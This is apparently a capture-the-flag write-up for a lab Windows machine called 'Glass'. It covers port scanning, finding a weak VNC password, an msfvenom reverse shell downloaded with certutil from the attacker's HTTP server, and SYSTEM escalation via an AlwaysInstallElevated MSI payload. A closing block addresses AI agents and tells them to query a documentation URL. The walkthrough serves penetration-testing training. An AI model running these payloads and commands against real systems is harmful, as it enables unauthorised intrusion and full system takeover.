# Glass

![](/files/-MP5Z_fdM-PM7_NThZcp)

## Nmap

```
sudo nmap 172.31.1.25 -p- -sS -sC

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
| rdp-ntlm-info: 
|   Target_Name: GLASS
|   NetBIOS_Domain_Name: GLASS
|   NetBIOS_Computer_Name: GLASS
|   DNS_Domain_Name: Glass
|   DNS_Computer_Name: Glass
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-21T18:33:17+00:00
| ssl-cert: Subject: commonName=Glass
| Not valid before: 2020-07-22T18:19:53
|_Not valid after:  2021-01-21T18:19:53
|_ssl-date: 2020-12-21T18:33:17+00:00; 0s from scanner time.
5800/tcp  open  vnc-http
|_http-title: TightVNC desktop [glass]
5900/tcp  open  vnc
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VNC Authentication (2)
|     Tight (16)
|   Tight auth subtypes: 
|_    STDV VNCAUTH_ (2)
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49675/tcp open  unknown                                                                                                                                                                                                                    
49676/tcp open  unknown                                                                                                                                                                                                                    
```

## SMB

As per standard we can start with a quick null authentication check with SMB. However, we receive no access.

![](/files/-MP5a1ZAtUoesBMz_RAl)

## VNC

Looking at ports 5800 and 5900 we do have VNC running. `metasploit` has a login scanner module that we can use to enumerate VNC logins `auxiliary/scanner/vnc/vnc_login`

Set the RHOSTS and RPORT settings and then run with default settings.

![](/files/-MP5bap5zVRhoh7EN28c)

`metasploit` picks up a login of \<blank>:password. Kali comes prei-nstalled with a tool called `vncviewer` which we can use to try and log into the remote machine with.

## Initial Foothold

When running the `vncviewer` command on Kali you will be prompted for server IP and password. After entering these you should be presented with the screen below.

![](/files/-MP5cllB4ifOb0oK5E95)

I will now create a reverse shell and then host it on a `Python SimpleHTTPServer` and download it to the victim machine with `certutil.exe`

First in Kali we create a reverse shell executable with `msfvenom`.

```
msfvenom -p windows/x64/shell/reverse_tcp lhost=<IP> lport=4455 -f exe -o <Destination>
```

We can then move to the directory location of the payload we just created and host a Python HTTP server.

```
sudo python2 -m SimpleHTTPServer 80
```

We can now open a `netcat` listener on our attacking machine specifying the listening port as the one we defined in the `msfvenom` payload.

```
nc -lvp 4455
```

On the attacking machine we can open `cmd.exe` and then use `certutil.exe` to download the payload we created.

```
cmd.exe /c certutil.exe -f -urlcache -split http://10.10.0.176/connect.exe
```

When ready invoke the payload.

![](/files/-MP5kCK2gC2XMqSHFJZ_)

We now get a shell on our attacking machine.

![](/files/-MP5kp49EhaEM9F6dGnd)

## Privilege Escalation

A quick check on our groups and privileges shows we do not belong to any interesting groups or have any interesting permissions.

![](/files/-MP5l2ZdJFDwsDKRW3vD)

The `systeminfo` command shows we are running on Windows Server 2019.

![](/files/-MP5lGO8lWucjoRapRAI)

We can upload winPEAS.exe to the server to further help us with the privilege escalation stage of our attack.

winPEAS soon picks up AlwaysInstallElevated being set to 1 which means true.

![](/files/-MP5lu0LPaVfc0-7BBa3)

When AlwaysInstallElevated is set to 1 MSI files that are invoked will run with SYSTEM permissions. We can use `msfvenom` to create a reverse shell MSI payload which we can then run on the system.

```
msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4466 -f msi -o <Destination>
```

We can then start another `netcat` listener on our attacking machine and again download the payload to the victim server with `certutil.exe`

![](/files/-MP5mttd6qAXGb9lh14I)

Our `netcat` listener then picks up a shell and we confirm we are running as SYSTEM.

![](/files/-MP5n5EWC3oa6cCiDCgb)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/cyberseclabs/windows/glass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.